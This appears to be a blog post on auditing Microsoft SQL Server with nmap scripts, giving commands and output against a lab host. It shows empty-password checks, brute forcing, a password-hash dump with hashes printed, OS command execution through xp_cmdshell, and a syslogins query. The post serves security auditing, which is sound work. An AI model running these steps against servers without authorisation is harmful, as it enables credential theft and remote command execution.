Control MS SQL Server security with nmap

Capture

At nmap there are many valuable scripts to control the secuirty  MS SQL server database. at this note I will show you how you can audit your SQL server with nmap

Check sa account with null password

ms-sql-empty-password

Attempts to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

One example

 

nmap -p 1433 –script ms-sql-empty-password 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 12:41 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00064s latency).

PORT     STATE SERVICE

1433/tcp open  ms-sql-s

| ms-sql-empty-password:

|   [192.200.11.11:1433]

|_    sa:<empty> => Login Success

MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 17.5

 

If port 445 ( microsoft-ds service )  is open

nmap -p 445 –script ms-sql-empty-password –script-args mssql.instance-all 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 12:44 EDT

Nmap scan report for 192.200.11.11

Host is up (0.00059s latency).

PORT    STATE SERVICE

445/tcp open  microsoft-ds

MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)

 

Host script results:

| ms-sql-empty-password:

|   [192.200.11.11:1433]

 

Brute Force attacks

nmap -p1433 –script ms-sql-brute 192.200.11.11

Host is up, received arp-response (0.00064s latency).

Scanned at 2016-06-12 12:20:41 EDT for 157s

PORT     STATE SERVICE  REASON

1433/tcp open  ms-sql-s syn-ack ttl 128

| ms-sql-brute:

|   [192.200.11.11:1433]

|_    No credentials found

MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)

Final times for host: srtt: 636 rttvar: 3138  to: 100000

Dumping the password hashes of an MS SQL server

 

If sa password is null

nmap -p1433 –script ms-sql-empty-password,ms-sql-dump-hashes 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 05:03 EDT

Nmap scan report for 192.200.11.11

Host is up (0.016s latency).

PORT     STATE SERVICE

1433/tcp open  ms-sql-s

| ms-sql-dump-hashes:

| [192.200.11.11:1433]

|     sa:0x0200EC357FC5FA85256C4BC37667845B81E84C0F3CA9E7AD2BC7FB94FB698E5243FC5112C2B240884C44E71FD45195BB60B4AAF63D24B909C5945285793D0605E4D09E886849

|     ##MS_PolicyTsqlExecutionLogin##:0x0200251457811E7CB37A8C9746EC742325673A60D16B98DF182FCF7E4410A2FB1B03C36B2E60A68BB269C7D47B3C43F6CB485365CF5D171A48171B6DA6DB74CDEA40759E9DFC

|     ##MS_PolicyEventProcessingLogin##:0x0200F8A9BBBADB33E242C190EE82D15BB47564F46C5BF7B29B0124F32DCFF96837F9F243BD054F0A0D2B8D5C4D95F885B30EAA47F94F7FBBD3EA613DF64F05E14659742EB868

Getting Information

Attempts to determine configuration and version information for Microsoft SQL Server instances.

No credentials are required

nmap -p1433-1900 –script ms-sql-info 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 11:55 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00096s latency).
Not shown: 467 closed ports
PORT STATE SERVICE
1433/tcp open ms-sql-s
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)

Host script results:
| ms-sql-info:
| 192.200.11.11:1433:
| Version:
| number: 11.00.3128.00
| Post-SP patches applied: true
| Service pack level: SP1
| Product: Microsoft SQL Server 2012
| name: Microsoft SQL Server 2012 SP1+
|_ TCP port: 1433

 

Running command shell on MS SQL servers

To run dir command on windows server , if the sa account password is null,

nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=sa,mssql.password=”,ms-sql-xp-cmdshell.cmd=”dir” 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 05:38 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00046s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-xp-cmdshell:
| [192.200.11.11:1433]
| Command: dir
| output
| ======
| Volume in drive C has no label.
| Volume Serial Number is 1E1E-6DAB
| Null
| Directory of C:\Windows\system32
| Null
| 19/06/2016 01:51 <DIR> .
| 19/06/2016 01:51 <DIR> ..
| 30/09/2013 16:44 <DIR> 0409
| 02/01/2016 12:33 <DIR> 1033
| 18/06/2013 07:48 160 @OpenWithToastLogo.png
| 18/06/2013 08:04 120 @TileEmpty1x1Image.png
| 22/08/2013 03:39 3,812,352 accessibilitycpl.dll
| 22/08/2013 04:45 39,424 ACCTRES.dll

 

Running SQL Query

Runs a query against Microsoft SQL Server (ms-sql).

 

nmap -p 1433 –script ms-sql-query –script-args mssql.username=sa,mssql.password=”,ms-sql-query.query=”SELECT * FROM syslogins” 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 06:02 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00060s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-query:
| [192.200.11.11:1433]
| Query: SELECT * FROM syslogins
| sid status createdate updatedate accdate totcpu totio spacelimit timelimit resultlimit name dbname password language denylogin hasaccess isntname isntgroup isntuser sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin loginname
| === ====== ========== ========== ======= ====== ===== ========== ========= =========== ==== ====== ======== ======== ========= ========= ======== ========= ======== ======== ============= =========== ========== ============ ========= ========= ========= =========
| 0x01 9 Apr 08, 2003 14:10:35 Jun 12, 2016 14:50:31 Apr 08, 2003 14:10:35 0 0 0 00sa master \x02\xEC\x7F\xFA%Kv\x84\x81L<\xE7+\xFB\xFB\x8ECQ\xC2@L\xE7\xD4\x95`\xAA=\xB9\xC5Ry\x06\xE4\x9Eh us_english0 1 0 0 0 1 0 0 0 0 0 0 0 sa
| 0x0106000000000009010000005FB6DAC7F7DB546D706711B128B5063888B01770 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLResourceSigningCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLResourceSigningCertificate##
| 0x010600000000000901000000A0B7FCD6F6D5FA771521910A3B71A750568D6275 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLReplicationSigningCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLReplicationSigningCertificate##
| 0x010600000000000901000000C2FB1C6E4485BB1056EBC85FD2CC2AD081390316 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLAuthenticatorCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLAuthenticatorCertificate##

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s